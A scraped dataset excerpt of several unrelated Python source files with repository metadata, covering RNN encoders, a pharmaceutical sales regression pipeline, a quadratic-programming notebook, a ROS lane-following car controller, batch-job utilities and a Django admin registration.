return_sequences: bool = False,
):
module = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
dropout=dropout,
bidirectional=bidirectional,
)
super().__init__(module, return_sequences)
class GRUEncoder(_RNNBaseEncoder):
def __init__(
self,
input_size: int,
hidden_size: int,
num_layers: int = 1,
bias: bool = True,
dropout: float = 0.0,
bidirectional: bool = False,
return_sequences: bool = False,
):
module = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
dropout=dropout,
bidirectional=bidirectional,
)
super().__init__(module, return_sequences)
| [
"mylhx288@gmail.com"
] | mylhx288@gmail.com |
d8bed30c8a0cf3430c84317e9f16661d9d0d56a9 | 9bace62d46d2b5e143e4bcea76886e0299505b03 | /scripts/pipeline.py | 981949bf17ce07517c5821be16929b930f6aa557 | [] | no_license | rssebudandi/pharmaceutical_sales | 502a33469fdef952beab4ee36bd524d6ca7e441c | 39af6d01ff27889d163d78348c78ac226b1ad639 | refs/heads/main | 2023-06-26T17:00:35.502554 | 2021-07-31T18:26:09 | 2021-07-31T18:26:09 | 390,386,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,729 | py | #Import neccessary libraries
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import pyplot
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import make_regression
from sklearn.metrics import mean_squared_error
#Read in the different datasets
#Read in store
store=pd.read_csv('../data/store.csv')
#Read in test data
test=store_data=pd.read_csv('../data/test.csv')
#Read in train data
train=store_data=pd.read_csv('../data/train.csv')
#Read in sample submission
sample_submission=store_data=pd.read_csv('../data/sample_submission.csv')
def add_colums(df):
df.Date = pd.to_datetime(df.Date)
df['Day'] = df.Date.dt.day
df['Month'] = df.Date.dt.month
df['Year'] = df.Date.dt.year
df['Weekday'] = df.Date.dt.weekday
df['Month_start'] = df.Date.dt.is_month_start
df['Month_end'] = df.Date.dt.is_month_end
return df
# encode data
def encode_data(df):
month_start_encoder = preprocessing.LabelEncoder()
month_end_encoder = preprocessing.LabelEncoder()
date_encoder = preprocessing.LabelEncoder()
state_hol_encoder = preprocessing.LabelEncoder()
day_encoder = preprocessing.LabelEncoder()
month_encoder = preprocessing.LabelEncoder()
year_encoder = preprocessing.LabelEncoder()
weekday_encoder = preprocessing.LabelEncoder()
open_encoder = preprocessing.LabelEncoder()
df['Month_start'] = month_start_encoder.fit_transform(df['Month_start'])
df['Month_end'] = month_end_encoder.fit_transform(df['Month_end'])
df['Date'] = date_encoder.fit_transform(df['Date'])
df['Day'] = day_encoder.fit_transform(df['Day'])
df['Month'] = month_encoder.fit_transform(df['Month'])
df['Year'] = year_encoder.fit_transform(df['Year'])
df['Weekday'] = weekday_encoder.fit_transform(df['Weekday'])
df['Open'] = open_encoder.fit_transform(df['Open'])
return df
#drop column
def drop_col(df,col):
df=df[df.columns[~df.columns.isin([col])]]
return df
#select feature columns
# select feature columns
def select_features(df):
if 'Sales' in df.columns:
feature_col = ["DayOfWeek", "Date", "Open", "Promo", "SchoolHoliday", "Day", "Month"]
features_X = df[feature_col]
target_y = train_clean["Sales"]
return features_X, target_y
else:
feature_col = ["DayOfWeek", "Date", "Open", "Promo", "SchoolHoliday", "Day", "Month"]
features_X = df[feature_col]
return features_X
if __name__ == '__main__':
train_modified=add_colums(train)
print(train_modified)
train_encoded = encode_data(train_modified)
print(train_encoded)
col = 'StateHoliday'
train_clean=drop_col(train_encoded, col)
print(train_clean)
train_features,target=select_features(train_clean)
print(train_features)
print(target)
#Testing
# test data
test_modified = add_colums(test)
# print(test_modified)
test_encoded = encode_data(test_modified)
# print(train_encoded)
col = 'StateHoliday'
test_clean = drop_col(test_encoded, col)
# print(train_clean)
test_features = select_features(test_clean)
# print(train_features)
test_features
#using a sklearn pipeline
# random forest regressor pipe
piperf = Pipeline([
('scalar', StandardScaler()),
('random_forest', RandomForestRegressor(max_depth=2, random_state=2))
])
piperf.fit(train_features,target)
print(piperf.predict(test_features))
| [
"sebudandi@gmail.com"
] | sebudandi@gmail.com |
0447f7db083947c6b41a4322462d09ba10952137 | c5b1d71856de92083e5a0dd4ea7a414f97e982fe | /experiment_mpc/Projected_Newton_Quadratic_Programming.py | 2c720ca408c904c641bf1d826e69da0f59322467 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | pfnet-research/chainer-differentiable-mpc | ff2c53f78993b9bbc6fb345c98ad757dc9c3ad72 | 05be1c1e06a3ced56e20fa0732c8247a9dc61ea7 | refs/heads/master | 2022-08-31T22:56:23.984781 | 2020-03-04T01:41:31 | 2020-03-04T01:41:31 | 213,283,149 | 12 | 7 | MIT | 2022-08-23T18:05:03 | 2019-10-07T02:55:48 | Python | UTF-8 | Python | false | false | 2,073 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
print(sys.path)
sys.path.append("../mpc")
from pnqp import PNQP
import chainer
import numpy as np
import matplotlib.pyplot as plt
H = np.array([[[ 7.9325, 4.9520, 1.0314, 0.2282],
[ 4.9520, 8.7746, 1.7916, 3.3622],
[ 1.0314, 1.7916, 4.2824, -2.5979],
[ 0.2282, 3.3622, -2.5979, 6.7064]],
[[ 3.4423, -1.9137, -0.9978, -4.4905],
[-1.9137, 6.7254, 3.3720, 1.7444],
[-0.9978, 3.3720, 3.5695, -0.9766],
[-4.4905, 1.7444, -0.9766, 13.0806]]])
H = chainer.Variable(H)
q = np.array([[ -0.8277, 8.5116, -12.1597, 17.9497],
[ -3.5764, -5.3455, -3.2465, 4.3960]])
q = chainer.Variable(q)
lower = np.array([[-0.2843, -0.0063, -0.1808, -0.6669],
[-0.1359, -0.3629, -0.2125, -0.0121]])
lower = chainer.Variable(lower)
upper = np.array([[0.1345, 0.0307, 0.0277, 0.9418],
[0.6205, 0.2703, 0.4023, 0.2560]])
upper = chainer.Variable(upper)
x_init = None
solve = PNQP(H,q,lower,upper)
# + {"active": ""}
# # tensor([[[ 7.9325, 4.9520, 1.0314, 0.2282],
# [ 4.9520, 8.7746, 1.7916, 3.3622],
# [ 1.0314, 1.7916, 4.2824, -2.5979],
# [ 0.2282, 3.3622, -2.5979, 6.7064]],
#
# [[ 3.4423, -1.9137, -0.9978, -4.4905],
# [-1.9137, 6.7254, 3.3720, 1.7444],
# [-0.9978, 3.3720, 3.5695, -0.9766],
# [-4.4905, 1.7444, -0.9766, 13.0806]]])
# tensor([[ -0.8277, 8.5116, -12.1597, 17.9497],
# [ -3.5764, -5.3455, -3.2465, 4.3960]])
# tensor([[-0.2843, -0.0063, -0.1808, -0.6669],
# [-0.1359, -0.3629, -0.2125, -0.0121]])
# tensor([[0.1345, 0.0307, 0.0277, 0.9418],
# [0.6205, 0.2703, 0.4023, 0.2560]])
# None
# tensor([[ 0.1239, -0.0063, 0.0277, -0.6669],
# [ 0.6205, 0.2703, 0.4023, -0.0121]])
| [
"yoiida333@gmail.com"
] | yoiida333@gmail.com |
3be9815f9c24a461e3836032f901e86a6b7e0623 | c827cac4c99ccfb7299d90325aa0625831d7f4ea | /rl-race-learning/main.py | 1adf04fd28ac35e00a73cc8c97962e90468cb31d | [] | no_license | Alarnti/CarDriving | e67f2b702e4408be9c17d870c36ab1d130e015c8 | 9affe35ea1c6f51f340a1e0ecf13b17d717209b3 | refs/heads/master | 2020-04-02T19:47:21.623621 | 2018-10-25T23:16:19 | 2018-10-25T23:16:19 | 154,746,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,697 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import roslib
# roslib.load_manifest('my_package')
import sys
import rospy
import cv2
import math
from std_msgs.msg import String
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from geometry_msgs.msg import Quaternion
from sensor_msgs.msg import Image, CompressedImage
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
from std_msgs.msg import Int16, UInt8
from gradients import get_edges
import tensorflow as tf
from collections import deque
from keras.models import Sequential, load_model
MODEL_PATH = 'actionValue.model'
np.set_printoptions(precision=2, suppress=True)
rospy.init_node('image_converter_foobar')
FRAMES = 4
COUNT = 0
from typing import Tuple
from keras.layers import Activation, MaxPooling2D, Dropout, Convolution2D, Flatten, Dense
from keras.models import Sequential, Model
from keras.layers.normalization import BatchNormalization
from keras import optimizers
from keras import regularizers
from keras.layers import merge, Input
from keras import backend as K
from keras.optimizers import Adam
class LaneTracker():
def __init__(self):
self.frames = deque(maxlen=FRAMES)
#y = 30
self.main_hor_line = (0, 1, -30)
def add_frame():
return 0
def intersection_of_lines(self, line_one, line_two):
# 0, 1, 2 = A, B, C
d = (line_one[0] * line_two[1] - line_two[0] * line_one[1]) + 1e-6
x = - (line_one[2] * line_two[1] - line_two[2] * line_one[1])/ \
d
y = - (line_one[0] * line_two[2] - line_two[0] * line_one[2])/ \
d
return y, x
def process_frame(self, frame):
# print(frame.shape)
# frame_ = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny((255*frame).astype(np.uint8),100,200)
edges[:30,:] = 0
edges[75:,:] = 0
edges[60:75, 30:70] = 0
a = self.coord_line(edges)
#print(a)
l = self.intersection_of_lines(self.main_hor_line, a[0])
r = self.intersection_of_lines(self.main_hor_line, a[1])
#print(l, r)
im_bgr = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
img_out = cv2.line(im_bgr, (0,30), (100,30), (0,0,255),2)
#line_im = cv2.line(im,(a[0][1], a[0][0]),(a[1][1], a[1][0]),(255))
#middle - red
cv2.circle(img_out,(50,30), 2, (255,0,0), -1)
#right - green
cv2.circle(img_out,(int(r[1]),int(r[0])), 5, (0,255,0), -1)
#left - yellow
# cv2.circle(img_out,(int(l[1]),int(l[0])), 2, (255,255,0), -1)
return img_out
def process_frame_(self, frame):
edges = cv2.Canny(frame,100,200)
edges[:30,:] = 0
edges[75:,:] = 0
edges[60:75, 30:70] = 0
return self.coord_line(edges)
def coord_line(self, edges):
points_right = []
points_left = []
filt = np.array([[1,1,1],[1,0,1],[1,1,1]])
for i in range(int(len(edges)/3.5),len(edges), 5):
found_left = False
found_right = False
for j in range(1, len(edges[0]) - 1):
if edges[i,j] > 0:
# print(edges[i-1:i+2,j-1:j+2])
if np.sum(edges[i-1:i+2,j-1:j+2] * filt) > 0:
if j < len(edges[0])/2 and not found_left:
points_left.append([i,j])
found_left = True
# elif j > len(edges[0])/2 and not found_right:
# points_right.append([i,j])
# found_right = True
if found_left:# and found_right:
break
for j in range(len(edges[0]) - 2, 1, -1):
if edges[i,j] > 0:
# print(edges[i-1:i+2,j-1:j+2])
if np.sum(edges[i-1:i+2,j-1:j+2] * filt) > 0:
# if j < len(edges[0])/2 and not found_left:
# points_left.append([i,j])
# found_left = True
if j > len(edges[0])/2 and not found_right:
points_right.append([i,j])
found_right = True
if found_right:
break
found_right_line = False
found_left_line = False
A_right = 0
B_right = 0
C_right = 0
A_left = 0
B_left = 0
C_left = 0
if len(points_right) > 1:
found_right = True
A_right = points_right[0][0] - points_right[-1][0]
B_right = points_right[-1][1] - points_right[0][1]
C_right = points_right[0][1] * points_right[-1][0] - \
points_right[-1][1] * points_right[0][0]
if len(points_left) > 1:
found_left_line = True
A_left = points_left[0][0] - points_left[-1][0]
B_left = points_left[-1][1] - points_left[0][1]
C_left = points_left[0][1] * points_left[-1][0] - \
points_left[-1][1] * points_left[0][0]
return (A_left, B_left, C_left),(A_right, B_right, C_right)#points_right[0], points_right[1]
tracker = LaneTracker()
#TUple changed
def create_atari_model(input_shape, output_units):
#def create_atari_model(input_shape: Tuple[ int, int, int], output_units: int) -> Model:
model = Sequential()
# model.add(Convolution2D(16, 5, 5, activation='relu', border_mode='same',
# input_shape=input_shape, subsample=(3, 3), init ='glorot_uniform', kernel_regularizer=regularizers.l2(0.01), bias_regularizer=regularizers.l2(0.01)))
# model.add(Convolution2D(32, 3, 3, activation='relu', border_mode='same', subsample=(1, 1), init='glorot_uniform', kernel_regularizer=regularizers.l2(0.01), bias_regularizer=regularizers.l2(0.01)))
# model.add(Flatten())
# model.add(BatchNormalization())
# model.add(Dense(256, activation='relu', init='glorot_uniform', kernel_regularizer=regularizers.l2(0.01), bias_regularizer=regularizers.l2(0.01), activity_regularizer=regularizers.l1(0.01)))
# model.add(Dense(output_units, activation='linear'))
# model.compile(optimizer=optimizers.Nadam(), loss='mean_squared_error', metrics=['mean_squared_error'])
# model.add(Convolution2D(16, 8, 8, activation='relu', border_mode='same',
# input_shape=input_shape, subsample=(4, 4)))
# model.add(Convolution2D(32, 4, 4, activation='relu', border_mode='same', subsample=(2, 2)))
# model.add(Flatten())
# model.add(Dense(256, input_shape=(2,), activation='relu'))
# model.add(Dense(128, activation='relu'))
# model.add(Dense(output_units, activation='linear'))
# model.compile(optimizer='RMSprop', loss='logcosh', metrics=['mean_squared_error'])
# NUM_ACTIONS = output_units
# input_layer = Input(shape = input_shape)
# conv1 = Convolution2D(16, 5, 5, subsample=(2, 2), activation='relu')(input_layer)
# pool = MaxPooling2D(pool_size=(2, 2), padding='valid')(conv1)
# conv2 = Convolution2D(32, 3, 3, subsample=(1, 1), activation='relu')(pool)
# #conv3 = Convolution2D(64, 3, 3, activation = 'relu')(conv2)
# flatten = Flatten()(conv2)
# fc1 = Dense(128)(flatten)
# advantage = Dense(NUM_ACTIONS)(fc1)
# fc2 = Dense(64)(flatten)
# value = Dense(1)(fc2)
# policy = merge([advantage, value], mode = lambda x: x[0]-K.mean(x[0])+x[1], output_shape = (NUM_ACTIONS,))
# model = Model(input=[input_layer], output=[policy])
# model.compile(optimizer=Adam(lr=0.0001), loss='logcosh', metrics=['mean_squared_error'])
# return model
# NUM_ACTIONS = output_units
# input_layer = Input(shape = input_shape)
# conv1 = Convolution2D(8, 11, 11, subsample=(2, 2), activation='relu')(input_layer)
# #pool = MaxPooling2D(pool_size=(2, 2), padding='valid')(conv1)
# #conv2 = Convolution2D(16, 3, 3, subsample=(1, 1), activation='relu')(conv1)
# #conv3 = Convolution2D(64, 3, 3, activation = 'relu')(conv2)
# flatten = Flatten()(conv1)
# fc1 = Dense(64, activation='relu')(flatten)
# advantage = Dense(NUM_ACTIONS)(fc1)
# fc2 = Dense(32, activation='relu')(flatten)
# value = Dense(1)(fc2)
# policy = merge([advantage, value], mode = lambda x: x[0]-K.mean(x[0])+x[1], output_shape = (NUM_ACTIONS,))
# model = Model(input=[input_layer], output=[policy])
# model.compile(optimizer=Adam(lr=0.0001), loss='logcosh', metrics=['mean_squared_error'])
# return model
NUM_ACTIONS = output_units
input_layer = Input(shape = input_shape)
conv1 = Convolution2D(8, 5, 5, subsample=(2, 2), activation='relu')(input_layer)
conv2 = Convolution2D(16, 3, 3, subsample=(2, 2), activation='relu')(conv1)
pool = MaxPooling2D(pool_size=(2, 2), padding='same')(conv1)
# conv3 = Convolution2D(32, 3, 3, activation = 'relu')(pool)
flatten = Flatten()(pool)
fc1 = Dense(128, activation='relu')(flatten)
advantage = Dense(NUM_ACTIONS)(fc1)
fc2 = Dense(64, activation='relu')(flatten)
value = Dense(1)(fc2)
policy = merge([advantage, value], mode = lambda x: x[0]-K.mean(x[0])+x[1], output_shape = (NUM_ACTIONS,))
model = Model(input=[input_layer], output=[policy])
model.compile(optimizer=Adam(lr=0.0001), loss='mse', metrics=['mean_squared_error'])
return model
def softmax(x):
# print x - np.max(x)
e_x = np.exp(x - np.max(x))
return e_x/e_x.sum()
class Filter:
def __init__(self, length):
self.predictionsMaxLength = length
self.lastPredictionsArray = np.zeros(self.predictionsMaxLength)
self.currentPosition = 0
self.firstlyFilled = False
def add_prediction(self, prediction):
if not self.firstlyFilled and self.currentPosition + 1 < self.predictionsMaxLength:
self.firstlyFilled = True
self.currentPosition = (self.currentPosition + 1) % self.predictionsMaxLength
self.lastPredictionsArray[self.currentPosition] = prediction
def get_filtered_prediction(self):
if self.firstlyFilled:
print self.lastPredictionsArray.astype(int)
return np.argmax(np.bincount(self.lastPredictionsArray.astype(int)))
return 1
class image_converter:
def __init__(self):
self.pubSpeed = rospy.Publisher('/manual_control/speed', Int16, queue_size=1, latch=True)
self.pubSteering = rospy.Publisher('/steering', UInt8, queue_size=1, latch=True)
# self.model = load_model(MODEL_PATH)
self.FRAME_COUNT = 4
self.im_input_shape = (100,100)
self.model = create_atari_model((self.im_input_shape[0], self.im_input_shape[1], self.FRAME_COUNT),3)
self.model.load_weights(MODEL_PATH)
self.model._make_predict_function()
self.graph = tf.get_default_graph()
self.frames = []
self.index = 0
self.max_frames = self.FRAME_COUNT
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/app/camera/rgb/image_color/compressed",CompressedImage,self.callback, queue_size=1)
self.frame_nums = 0
self.cache = deque(maxlen=self.FRAME_COUNT)
self.frame_count = 0
self.filter = Filter(5)
self.current_speed = 130
self.current_steering = 90
self.last_command_time = rospy.get_time()
self.prev_command = 1
self.mask_right = np.ones((480,640))
# for i in range(0,len(self.mask_right)):
# for j in range(0,len(self.mask_right[0])):
# if i < 2.5 * j - 25:
# self.mask_right[i,j] = 0
def softmax(self, x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum(axis=0)
def add_frame(self, image):
self.cache.append(image)
while len(self.cache) < self.FRAME_COUNT:
self.cache.append(image)
# print len(self.cache)
self.frames = np.stack(self.cache, axis=2)
# print 'ads',self.frames.shape
self.index = (self.index + 1) % 4
self.frame_nums += 1
def predict(self, image=None):
with self.graph.as_default():
x = np.expand_dims(self.frames, axis = 0)
# print x.shape
pred = self.model.predict(x)[0]
softmax = self.softmax(pred)
print pred
print softmax
# print softmax[np.argmax(softmax)]
# if softmax[np.argmax(softmax)] > 0.30:
return np.argmax(softmax)
# else:
# return None
# return np.argmax(pred)
def callback(self,data):
try:
frame = self.bridge.compressed_imgmsg_to_cv2(data, "bgr8")
pass
except CvBridgeError as e:
print(e)
# print('AAAAAAAAA')
self.frame_count += 1
# frame = cv2.flip(frame, 1)
frame = cv2.resize(frame, self.im_input_shape)
frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HLS)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
lower = np.array([0, 175, 0])
upper = np.array([180,255,255])
# resized = cv2.resize(frame, self.im_input_shape)
frame[:int(len(frame)/3),:] = 0
# frame[int(len(frame)/1.8):, :int(len(frame[0])/5)] = 0
# frame[:int(len(frame)*3/4), int(len(frame[0])*3/4):] = 0
mask = cv2.inRange(frame_hsv, lower, upper)
res = cv2.bitwise_and(frame,frame, mask= mask)
# res = cv2.bitwise_and(res,res, mask=self.mask_right.astype(np.uint8))
# kernel = np.ones((7,7))
# res = cv2.dilate(res,kernel,5)
resized = res#<cv2.resize(res, self.im_input_shape)
ret, resized = cv2.threshold(resized,150,255,cv2.THRESH_BINARY)
# resized[:int(len(resized)/),:] = 0
edges = get_edges(resized)
resized = edges.astype(np.float32) #resized.astype(np.float32)
# resized = np.clip(resized + np.mean(resized), 0, 1)
# print(np.mean(np.clip(resized + np.mean(resized), 0, 1)))
resized = (resized) * 255 #/ 255
# print(np.max(resized))
self.add_frame(resized)
# self.filter.add_prediction(command)
# filtered_command = self.filter.get_filtered_prediction()
# command = filtered_command
command = None
current_time = rospy.get_time()
if current_time - self.last_command_time > 0.3:
command = self.predict()
if command is None:
command = self.prev_command
# print(current_time - self.last_command_time)
self.last_command_time = current_time
self.current_steering = 90 *(2 -command)#(2 - command)#(self.filter.get_filtered_prediction())# self.filter.get_filtered_prediction())
# if self.prev_command != self.current_steering:
# steering_now = 90*(2 - self.prev_command)
print self.current_steering
# print(current_time)
self.pubSpeed.publish(self.current_speed)
self.pubSteering.publish(self.current_steering)
if command is None:
command = self.prev_command
self.prev_command = command
#global COUNT
#cv2.imwrite('real_ims/' + str(COUNT) + '.png', res)
#COUNT += 1
cv2.imshow('edges',255 *edges)
# cv2.imshow('resized',cv2.putText(cv2.resize(resized, (frame.shape[1], frame.shape[0])), str(command), (10, len(res[0])//2), cv2.FONT_HERSHEY_SIMPLEX, 3, 255))
# cv2.imshow('frame',cv2.putText(frame, str(command), (10, len(res[0])//2), cv2.FONT_HERSHEY_SIMPLEX, 3, 255))
# cv2.imshow('hist',hist_im)
cv2.waitKey(1)
ic = image_converter()
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
cv2.destroyAllWindows()
#600/400 -> 35.3/23.5
# 45/ 18/ 17 cm
# 2.65/1.05/1
#Un 7/5/5 | [
"alb.atlasov@gmail.com"
] | alb.atlasov@gmail.com |
749d2c1a1aec1821efb6595ac36154a2c3c7d7d3 | 1ee36eb16394cd5a96173597e6f76adb1e2c1e11 | /batchgen/util.py | 74a3fb9636d37456ffe39f86e7b322d0f1c990f0 | [
"MIT"
] | permissive | UtrechtUniversity/hpc-batch-gen | 94a93903f9b3e2b4e8f6c4feefdb6aca2baf1384 | 414383de8d95e140c513de48abfe4a47f4bcbe9b | refs/heads/master | 2020-04-25T15:22:18.402545 | 2019-04-26T10:57:31 | 2019-04-26T10:57:31 | 172,876,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | '''
Some helpful functions.
@author: Raoul Schram
'''
import os
import re
def _read_file(script):
""" Function to load either a script file or list.
Arguments
---------
script: str/str
Either a file to read, or a list of strings to use.
Returns
-------
List of strings where each element is one command.
"""
if script is None:
return ""
with open(script, "r") as f:
script_string = f.read()
return script_string
def _split_commands(script):
""" Split commands from a string into a list of commands.
Arguments
---------
script: str
Command as read directly from a file.
Returns
-------
str:
List of commands, lines with only whitespce removed,
and also lines starting with #.
"""
real_commands = []
for line in script.split("\n"):
only_whitespace = re.match(r"\A\s*\Z", line) is not None
sw_hash = re.match(r"^#", line) is not None
if only_whitespace or sw_hash:
continue
real_commands.append(line)
return real_commands
def _check_files(*args):
""" Check if files exist.
Arguments
---------
args: str
List of files to check.
Returns
-------
int:
Number of non-existing files.
"""
n_error = 0
for filename in args:
if filename is None:
continue
if not os.path.isfile(filename) and filename != "/dev/null":
print("Error: file {file} does not exist.".format(file=filename))
n_error += 1
return n_error
def batch_dir(backend, job_name, remote=False):
""" Return a directory from the backend/job_name/remote. """
if remote:
new_dir = os.path.join("batch."+backend+".remote", job_name)
else:
new_dir = os.path.join("batch."+backend, job_name)
return os.path.abspath(new_dir)
def mult_time(clock_wall_time, mult):
""" Multiply times in hh:mm:ss by some multiplier.
Arguments
---------
clock_wall_time: str
Time delta in hh:mm:ss format.
mult
Multiplier for the time.
Returns
-------
str:
Time delta multiplied by the multiplier in hh:mm:ss format.
"""
hhmmss = clock_wall_time.split(":")
hhmmss.reverse()
new_ss = (int(hhmmss[0])*mult)
new_mm = new_ss // 60
new_ss %= 60
new_mm += (int(hhmmss[1])*mult)
new_hh = new_mm // 60
new_mm %= 60
new_hh += (int(hhmmss[2])*mult)
new_hhmmss = "{hh:02d}:{mm:02d}:{ss:02d}".format(hh=new_hh, mm=new_mm,
ss=new_ss)
return new_hhmmss
| [
"r.d.schram@uu.nl"
] | r.d.schram@uu.nl |
31f3935d3cda0bac22f397e9b82b4a7d882bc3ca | 80f6c09fc186102766929c5f3c4e35190b2825f0 | /app/admin.py | d00f7f16790dad1ce789ef29494c0b0934054f96 | [] | no_license | BibekDas619/E_commerce-website | fa07ff073d7a9be190ef9c7b97e02cfdf52a6dcd | b5a44611863cbbea482e48eb9794e93b3d628ccd | refs/heads/master | 2023-03-14T23:25:37.828550 | 2021-03-11T04:28:42 | 2021-03-11T04:28:42 | 346,576,592 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from django.contrib import admin
# Register your models here.
from django.contrib import admin
from app.models import Product,Contact,Order,CustomUser
# Register your models here.
admin.site.register(Contact)
admin.site.register(Product)
admin.site.register(Order)
admin.site.register(CustomUser) | [
"bibekdas993@gmail.com"
] | bibekdas993@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.